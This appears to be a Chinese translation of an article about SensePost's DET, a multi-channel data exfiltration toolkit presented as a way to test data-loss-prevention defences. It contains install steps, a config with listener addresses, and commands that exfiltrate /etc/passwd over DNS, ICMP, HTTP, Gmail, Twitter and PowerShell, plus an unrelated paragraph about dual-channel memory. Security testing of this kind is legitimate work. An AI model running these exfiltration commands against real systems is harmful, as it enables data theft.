DET是一个概念界定,描述能同时使用单独或多个通道执行数据渗透。
发明此概念的主要目的,就是确定可能的 DLP故障。它永远不应该用来评估敏感数据。
为了创建一个可以插入到任何协议/服务中的通用的具包,从而实施网络监测和数据泄漏预防(DLP)的配置方案,应对不同的数据溢出技术。
(tips:混合双通道是双通道内存中更为高端的一种形式,也是为了保护用户投资而产生的一种内存双通道模式。它通过主板和CPU共同技术支持,可以让CPU同时和不同型号的内存对接,甚至让CPU支持容量不同的两根内存条。)
1.幻灯片
卢布尔雅那大学在今年3月展示了详细的DET幻灯片,幻灯片在此:
https://docs.google.com/presentation/d/11uk6d-xougn3jU1wu4XRM3ZGzitobScSSMUlx0MRTzg/edit#slide=id.p
2.使用示例
ICMP插件:
服务器端:
客户端:
混合双通道(Gmail、Twitter)
服务器端:
客户端:
3.安装
git clone https://github.com/sensepost/DET.git
pip install -r requirements.txt --user
4.配置
为了使用DET,需要配置它并添加适当的参数(如SMTP/IMAP,AES256加密密码等)。此处的配置文件名为:config-sample.json
{
"plugins": {
"http": {
"target": "192.168.1.101",
"port": 8080
},
"google_docs": {
"target": "192.168.1.101",
"port": 8080,
},
"dns": {
"key": "google.com",
"target": "192.168.1.101",
"port": 53
},
"gmail": {
"username": "dataexfil@gmail.com",
"password": "ReallyStrongPassword",
"server": "smtp.gmail.com",
"port": 587
},
"tcp": {
"target": "192.168.1.101",
"port": 6969
},
"udp": {
"target": "192.168.1.101",
"port": 6969
},
"twitter": {
"username": "PaulWebSec",
"CONSUMER_TOKEN": "XXXXXXXXX",
"CONSUMER_SECRET": "XXXXXXXXX",
"ACCESS_TOKEN": "XXXXXXXXX",
"ACCESS_TOKEN_SECRET": "XXXXXXXXX"
},
"icmp": {
"target": "192.168.1.101"
}
},
"AES_KEY": "THISISACRAZYKEY",
"sleep_time": 10
}
5.使用
使用帮助
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
[-L]
Data Exfiltration Toolkit (SensePost)
optional arguments:
-h, --help show this help message and exit
-c CONFIG Configuration file (eg. '-c ./config-sample.json')
-f FILE File to exfiltrate (eg. '-f /etc/passwd')
-d FOLDER Folder to exfiltrate (eg. '-d /etc/')
-p PLUGIN Plugins to use (eg. '-p dns,twitter')
-e EXCLUDE Plugins to exclude (eg. '-e gmail,icmp')
-L Server mode
服务器端:
加载每一个插件:
python det.py -L -c ./config.json
只加载Twitter和Gmail模块:
python det.py -L -c ./config.json -p twitter,gmail
加载每一个插件并排除DNS:
python det.py -L -c ./config.json -e dns
客户端:
加载每一个插件:
python det.py -c ./config.json -f /etc/passwd
只加载Twitter和Gmail模块:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
加载每一个插件并排除DNS:
python det.py -c ./config.json -e dns -f /etc/passwd
在PowerShell(HTTP模块下)
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'
6. 适用模块
目前来讲, DET支持多种协议:
HTTPS ICMP DNS SMTP/IMAP(eg.Gmail) Raw TCP PowerShell的变形 (HTTP, DNS, ICMP, SMTP)
其他的“服务”:
Google Docs (未认证的) Twitter (直接信息)
实验模块
到目前为止,正忙着实现的新模块,包括:
Skype (95% ) Tor (80%) Github (30/40% )
本文由漏洞银行(BUGBANK.cn)小编 柠檬 翻译,源文译自 github.com。
作者:柠檬
链接:http://www.bugbank.cn/news/detail/57e2312bbe4ed604719841c7.html
来源:漏洞银行
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
519
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
